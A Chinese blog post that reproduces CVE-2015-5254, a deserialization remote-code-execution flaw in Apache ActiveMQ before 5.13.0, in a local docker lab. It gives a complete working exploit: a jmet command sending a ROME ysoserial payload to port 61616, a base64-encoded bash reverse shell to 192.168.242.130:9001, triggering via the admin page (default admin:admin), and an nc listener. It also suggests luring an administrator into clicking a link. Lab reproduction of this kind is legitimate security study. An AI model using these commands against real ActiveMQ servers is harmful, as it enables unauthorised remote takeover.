首页 > 其他分享 >CVE-2015-5254(ActiveMQ-反序列化漏洞)

CVE-2015-5254(ActiveMQ-反序列化漏洞)

时间:2024-09-13 14:52:32浏览次数:3  
标签:CVE 5254 61616 端口 漏洞 序列化 ActiveMQ bash

漏洞描述

  1. 编号:CVE-2015-5254
  2. 影响版本:Apache ActiveMQ 5.13.0之前5.x版本
  3. CVE地址:CVE-2015-5254
  4. 漏洞原理:该漏洞源于程序没有限制可在代理中序列化的对象。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码

复现

环境

windows,docker,nc:kali(192.168.242.130),java8

步骤

启动环境

docker-compose up -d
docker ps

 监听了61616和8161端口,其中61616是工作端口,消息就在这个端口进行传递;8161是web管理页面的端口,访问127.0.0.1:8186即可访问,不过这个漏洞理论上不需要web的

可以通过管理页面来看版本默认账号密码为admin:adminhttp://127.0.0.1:8161/api/jolokia/,或者使用云悉指纹识别,我这里是本地,云悉是不可以识别本地的

漏洞利用

1、构造可以执行命令的序列化对象

使用jmet进行漏洞利用,下载完在同目录下创建一个external文件夹(否则可能会报错说文件夹不存在)

2、使用Online - Reverse Shell Generator生成一个反弹shell的命令作为一个消息发送给61616端口

 sh -i >& /dev/tcp/192.168.242.130/9001 0>&1进行base64编码c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==

因此这条消息就是bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}"

java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC4yNDIuMTMwLzkwMDEgMD4mMQ==}|{base64,-d}|{bash,-i}" -Yp ROME 127.0.0.1 61616

 -Q:列队消息名、-I:选择装载的JMS客户端、-s:选择ysoserial payload、-Y:执行具体命令、-Yp:指定payload类型,后面跟ActiveMQ所在机器的ip以及工作端口

因此这条命令就是使用ROME payload类型把执行的命令进行序列化后作为名为event的消息发送给ActiveMQ

3、访问web管理页面,读取消息,触发漏洞

点击查看这条消息即可触发命令执行

4、kali中使用nc -lvnp 9001即可连接

 修复

实际中可能无法获取管理员权限来触发该消息,因此需要诱导管理员点击某个链接来触发

可以通过打补丁或者升级到新版本即可

标签:CVE,5254,61616,端口,漏洞,序列化,ActiveMQ,bash
From: https://blog.csdn.net/m0_74168970/article/details/142178619

相关文章

  • jackson 原生反序列化触发 getter 方法
    jackson原生反序列化触发getter方法jackson的POJONode方法可以任意调用getterjackson序列化会任意调用getter分析jackson序列化会调用任意getter方法,jackson反序列化也会任意调用getter,这两个都不需要多说什么了,在前面的jackson反序列化中的TemplatesImpl......
  • jackson 反序列化学习
    jackson反序列化学习jackson介绍Jackson是一个用于处理JSON数据的开源Java库。SpringMVC的默认json解析器便是Jackson。Jackson优点很多。Jackson所依赖的jar包较少,简单易用。与其他Java的json的框架Gson等相比,Jackson解析大的json文件速度比较快;Ja......
  • Apache OFBiz远程代码执行漏洞(CVE-2024-38856)
    漏洞简介ApacheOFBiz是一个开源的企业资源规划系统,提供了一整套企业管理解决方案,涵盖了许多领域,包括财务管理、供应链管理、客户关系管理、人力资源管理和电子商务等。ApacheOFBiz基于Java开发,采用灵活的架构和模块化设计,使其可以根据企业的需求进行定制和扩展,它具有强大的......
  • NC 序列化二叉树
    系列文章目录文章目录系列文章目录前言前言前些天发现了一个巨牛的人工智能学习网站,通俗易懂,风趣幽默,忍不住分享一下给大家。点击跳转到网站,这篇文章男女通用,看懂了就去分享给你的码吧。描述请实现两个函数,分别用来序列化和反序列化二叉树,不对序列化之后的字......
  • fastjson1.2.24反序列化漏洞复现 CVE-2017-18349
    1.准备:1.1复现环境漏洞环境:vulnhub靶场工具准备:jdk8,apache-maven-3.9.9,kali2024.1,MarshalSec1.2环境启动进入vulnhub目录下的fastjson目录,进入CVE-2017-18349目录cd/home/hbesljx/vulhub/fastjson/1.2.24-rcedocker-compoe启动漏洞环境docker-composeup-d访问靶机......
  • Springboot枚举自定义序列化
    packagexxxxxxxxxxxxx;importcom.fasterxml.jackson.core.JsonGenerator;importcom.fasterxml.jackson.databind.JsonSerializer;importcom.fasterxml.jackson.databind.ObjectMapper;importcom.fasterxml.jackson.databind.SerializerProvider;importcom.fasterx......
  • 【高级编程】Java IO流(补)序列化 & 反序列化
    序列化(ObjectOutputStream)&反序列化(ObjectInputStream)Java的序列化和反序列化是用于将对象转换为字节流的过程,以便在网络上传输或保存到磁盘,然后将这些字节流再转换回对象。这个过程是Java中处理对象持久化和传输的常见方法。序列化是将对象的状态转换为字节流的过......
  • Windows远程桌面授权远程代码执行漏洞CVE-2024-38077(POC、EXP)
    目录漏洞描述关键信息漏洞影响漏洞危害等级影响范围漏洞解决方案临时缓解方案升级修复方案POCEXP使用参考漏洞描述CVE-2024-38077是Windows远程桌面授权服务(RDL)中的一个堆溢出漏洞。该漏洞在解码用户输入的许可密钥包时,未正确验证解码后的数据长度与缓冲区......
  • Goby 漏洞发布|(CVE-2024-45195)Apache OFBiz /viewdatafile 代码执行漏洞【已复现】
    漏洞名称:ApacheOFBiz/viewdatafile代码执行漏洞(CVE-2024-45195)EnglishName:ApacheOFBiz/viewdatafileCodeExecutionVulnerability(CVE-2024-45195)CVSScore: 8.0漏洞描述:ApacheOFBiz是一个开源企业资源规划(ERP)系统。它提供了一套企业应用程序,集成并自动化企业的......
  • RapidJSON 的坑--允许Object对象存在相同的key,且key为数字时序列化报异常
    RapidJSON的坑--允许Object对象存在相同的key,且key为数字时序列化报异常测试代码如下:1voidshow(rapidjson::Document&doc)2{3printf("-----------------foriterator\nMemberCount:%d\n",doc.MemberCount());4for(autoit=doc.MemberBegin();it!=doc......